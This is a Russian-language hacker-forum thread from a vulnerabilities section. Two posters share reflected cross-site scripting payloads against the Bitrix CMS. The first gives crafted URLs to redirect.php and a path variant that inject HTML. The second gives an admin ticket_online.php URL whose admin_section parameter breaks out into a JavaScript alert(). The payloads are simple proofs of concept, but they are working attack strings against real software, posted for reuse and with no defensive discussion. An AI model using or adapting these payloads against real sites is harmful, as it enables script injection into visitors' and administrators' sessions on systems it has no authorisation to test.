Кто ещё не знает про пассивную XSS в bitrix?

Discussion in 'Уязвимости' started by _kREveDKo_, 23 May 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    http://site.net/bitrix/redirect.php?event1=pofig&event2=pofig&event3=pofig&goto="><h1>XSS
    (или http://site.net/bitrix/"><h1>xexe)

    ерунда, конечно, но всё-таки...
    и я вновь и вновь извиняюсь, если это уже не свежая инфа...
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    тоже еще одна хсс в самой же админки после капчи
    /bitrix/admin/ticket_online.php?ticket_id=1&owner_user_id=77&lang=&online_auto_refresh=999&admin_section=N'},17);alert()//
     
    #2 sabe, 30 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.